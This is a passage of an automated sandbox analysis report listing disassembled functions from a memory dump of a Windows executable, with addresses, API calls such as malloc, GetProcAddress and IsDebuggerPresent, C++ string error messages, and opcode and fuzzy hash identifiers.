Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: d48a312505f0d7753b5e0af4059756c973b08e8edd7f46ab5558ae8c63b7ed28
Instruction ID: f76cc997199daf9920a01952afbf674f1e10638f018bd304832e522200c84554
Opcode Fuzzy Hash: d48a312505f0d7753b5e0af4059756c973b08e8edd7f46ab5558ae8c63b7ed28
Instruction Fuzzy Hash: DA114F72A15B01D2E710EF14E880369B3B1FB88748F954135C28C073A4DF7DD584D7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738D96306 Relevance: 1.3, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF738DC2752

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 0ebee6292a8557c15174a4ab0a03ffd8c5c9ca548531957df58a5e65fb3db361
Instruction ID: 7e13c31b7c6eac0bd740f7a02cb58dfc95f2d31a20957bd92a880cd6a7c09a60
Opcode Fuzzy Hash: 0ebee6292a8557c15174a4ab0a03ffd8c5c9ca548531957df58a5e65fb3db361
Instruction Fuzzy Hash: D1112E72A15B02D2E711EF14E881369B3B1FB88748F955135C28C073A4DF7DE549D7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738D963FF Relevance: 1.3, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF738DC2752

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 277ec0329c7c4dbc9df98e64df30877a426ff65a56704ba7fd0b275a463b7bd2
Instruction ID: dcbae16c06ed135b7ab0cfec325b59d1bfc4350556f8e55f606e6c52e16f312a
Opcode Fuzzy Hash: 277ec0329c7c4dbc9df98e64df30877a426ff65a56704ba7fd0b275a463b7bd2
Instruction Fuzzy Hash: 64113972A18B02D2E711AF14E8803A9B3B1FF88708FA59135C28D073A4DF3DE445D7A4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF738DB1DD0 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF738DB1DE1
GetProcAddress.KERNEL32 ref: 00007FF738DB1DF8
LoadLibraryW.KERNEL32 ref: 00007FF738DB1E1F
GetProcAddress.KERNEL32 ref: 00007FF738DB1E2F

Strings

SystemFunction036, xrefs: 00007FF738DB1E25
rand_s, xrefs: 00007FF738DB1DEE
advapi32.dll, xrefs: 00007FF738DB1E18
msvcrt.dll, xrefs: 00007FF738DB1DDA

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
API String ID: 384173800-4041758303
Opcode ID: 4f62b90e336705d4da321a7fa2fb84c276bc2db0b258b9504fce3f42ee99db90
Instruction ID: 52ed449376a8fbe24e13cd5e83e257cea45d36be4b59e3d958c17e7e054d9892
Opcode Fuzzy Hash: 4f62b90e336705d4da321a7fa2fb84c276bc2db0b258b9504fce3f42ee99db90
Instruction Fuzzy Hash: A0F0A4A1A1EA13B1EE05BF55FC54178A376BF09790BC40536C80E86364FE3CE558E764

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DA6EE0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 35windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF738DA6EEA
FormatMessageA.KERNEL32 ref: 00007FF738DA6F2B
IsDebuggerPresent.KERNEL32 ref: 00007FF738DA6F35

Strings

aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAAaaAAAaaAaaaaaAaAaaaAaAaaaaaaaaa, xrefs: 00007FF738DA6EE2

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: DebuggerErrorFormatLastMessagePresent
String ID: aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAAaaAAAaaAaaaaaAaAaaaAaAaaaaaaaaa
API String ID: 2392558662-3296398784
Opcode ID: fd52d147f527fa6bcd06c01c60e71c22fdd217dc7770cd6842f4e7a378731cf7
Instruction ID: 3f7746660a9b733fcf1a9eb00a3c2b7885997debe2f2fd61672bcc21ca68b874
Opcode Fuzzy Hash: fd52d147f527fa6bcd06c01c60e71c22fdd217dc7770cd6842f4e7a378731cf7
Instruction Fuzzy Hash: 5E0186A2A2C902E1E750AF29F858339E3B1BF88B84F944034DA4D86654EF3DD544D714

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738D929D0 Relevance: 9.1, APIs: 7, Instructions: 394COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f08ac056ea1446a078513607b21dd001efd89fe99ad7d12ecb6b362ca93e335e
Instruction ID: a61a5a60d4aba8b4270e44f966fee87cacd20569a624e380d1b1b2c11670f148
Opcode Fuzzy Hash: f08ac056ea1446a078513607b21dd001efd89fe99ad7d12ecb6b362ca93e335e
Instruction Fuzzy Hash: 7B1204239287C2A1EB51AB39E4057BAE7A0BF99790F809230DE9C07795EF7DD048D714

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DA6CE0 Relevance: 4.6, APIs: 3, Instructions: 77COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00007FF738DA6D65
IsDebuggerPresent.KERNEL32 ref: 00007FF738DA6D8A
RaiseException.KERNEL32 ref: 00007FF738DA6DB0

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: DebuggerExceptionPresentRaisefree
String ID:
API String ID: 462861877-0
Opcode ID: 28b765f4a46f912bad7707cfc93421a53766a827a87c05640473c97366374b00
Instruction ID: 9e9f521473b9705f9019cee66de2abc8b5ff3037c5c90ab37d6ebbf9ddd7c89b
Opcode Fuzzy Hash: 28b765f4a46f912bad7707cfc93421a53766a827a87c05640473c97366374b00
Instruction Fuzzy Hash: 0921D623A2D242A2FF62AF15A500368E294BF48BE4FA44274DE1D0B7C4EF3DD545E314

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DB8100 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 73stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF738DB81A9

Part of subcall function 00007FF738DB8580: memcpy.MSVCRT ref: 00007FF738DB85FB

memset.MSVCRT ref: 00007FF738DB8159

Strings

basic_string::_M_replace_aux, xrefs: 00007FF738DB8180

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: memcpymemsetstrlen
String ID: basic_string::_M_replace_aux
API String ID: 160209724-2536181960
Opcode ID: e13b374acd0977eb9fd4fe879805c0dd20afc90dbef44aaa3ecbdcb4d051adf7
Instruction ID: 506c80490065fc73157296cb1b9cb388630370e7cdfc7f7a2a4015049b5859d5
Opcode Fuzzy Hash: e13b374acd0977eb9fd4fe879805c0dd20afc90dbef44aaa3ecbdcb4d051adf7
Instruction Fuzzy Hash: E3110103F2A1A821E812BA6B7C014E9D2142B5EFE4ED84231EE1C17781DC3CD886D304

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DB81D0 Relevance: 2.5, Strings: 2, Instructions: 34COMMON

Download Yara Rule

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF738DB83A9
basic_string::replace, xrefs: 00007FF738DB83A2

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::replace
API String ID: 0-3564965661
Opcode ID: 52bc733c84fad3ed6fbef407dfbaf4f05d60fd4f932c361f6de10b9818d5177c
Instruction ID: 11b56b11b795f6ebed594a059f5c7c67f297402fa024b6aff5952125d1221264
Opcode Fuzzy Hash: 52bc733c84fad3ed6fbef407dfbaf4f05d60fd4f932c361f6de10b9818d5177c
Instruction Fuzzy Hash: F0F01D52E18A5670D900BF63D8454BAE3327B5ABC8F845432EE0C5B356DE39D105D354

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DBF1C0 Relevance: 2.5, Strings: 2, Instructions: 33COMMON

Download Yara Rule

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF738DBF200
basic_string::assign, xrefs: 00007FF738DBF1F9

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::assign
API String ID: 3510742995-2669816585
Opcode ID: 8a923c3d374cfffc7e0aa0d47eacc92a0f8a036f2f6f80d67fa431de05af8495
Instruction ID: e3554e98427cb861e0adac5c0696643d4708748749514044cdf089cd14db08e9
Opcode Fuzzy Hash: 8a923c3d374cfffc7e0aa0d47eacc92a0f8a036f2f6f80d67fa431de05af8495
Instruction Fuzzy Hash: 5EF06D66E05A85A1EA00BF65D8010ACE331F7A9F84FC45532EA8C53325DF3DE556D708

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DBC000 Relevance: 2.5, Strings: 2, Instructions: 33COMMON

Download Yara Rule

Strings

basic_string::assign, xrefs: 00007FF738DBC039
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF738DBC040

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::assign
API String ID: 3510742995-2669816585
Opcode ID: 336f956ad0847754b7ed12ec066e3f99e5549a7b523b592d2852de853e97e5d0
Instruction ID: 63ca8e85c4ae150fec7b87be57b0c913fe9a8120753612352366d935f7e9ee27
Opcode Fuzzy Hash: 336f956ad0847754b7ed12ec066e3f99e5549a7b523b592d2852de853e97e5d0
Instruction Fuzzy Hash: 59F04966E05B86A5EA10AF61D8014ACE762F799B84FD44132DA4C13321DE3DD956D708

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DB5530 Relevance: 2.5, Strings: 2, Instructions: 32COMMON

Download Yara Rule

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF738DB5580
basic_string::substr, xrefs: 00007FF738DB5579

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::substr
API String ID: 0-3532027576
Opcode ID: 101c97d25de8f3686c31f21e631c822240c8c23bd588f4edd234e44d22aeb880
Instruction ID: 60fa7cb6305fbe2f71848778fbdf6feefd0a0a891222a6d5fa917b0a48ab0f0a
Opcode Fuzzy Hash: 101c97d25de8f3686c31f21e631c822240c8c23bd588f4edd234e44d22aeb880
Instruction Fuzzy Hash: B3F0BE23B14B0AA1EE00EFAAE4904B8E320A769BC4B906432C90D13310EE3CE155D348

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DA73B0 Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF738DA73B9

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: Time$FileSystem
String ID:
API String ID: 2086374402-0
Opcode ID: 423f769804600cd6bbc26f7e556856e5845ce01c802931d0282d5239cab030d1
Instruction ID: e1755d7d59ef44431b2e90f10c194570726872a9b28490197148ff77a2dfa843
Opcode Fuzzy Hash: 423f769804600cd6bbc26f7e556856e5845ce01c802931d0282d5239cab030d1
Instruction Fuzzy Hash: 3BD012E6B1864987CE20DB05F451155A762A7DC7D4B404120EE4D83728EE3CEA168F00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DC22E0 Relevance: 1.4, Strings: 1, Instructions: 187COMMON

Download Yara Rule

Strings

basic_string::_M_create, xrefs: 00007FF738DC23A2

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: strlen$CaptureContextUnwindabortmalloc
String ID: basic_string::_M_create
API String ID: 214865124-3122258987
Opcode ID: 56a730b624957fdfe59585361835cd4944ad67ef4d9076c70fd66d217f432776
Instruction ID: 362309ce5893695145128cfaced8ea7ea7554f63ab199061ec03b2bee6dae91d
Opcode Fuzzy Hash: 56a730b624957fdfe59585361835cd4944ad67ef4d9076c70fd66d217f432776
Instruction Fuzzy Hash: 30416052E2A55774E948BB66A8111BAD332BF4EBC4FC02431EC4D1B342DD3DE00CA3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DC23A0 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

basic_string::_M_create, xrefs: 00007FF738DC23A2

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
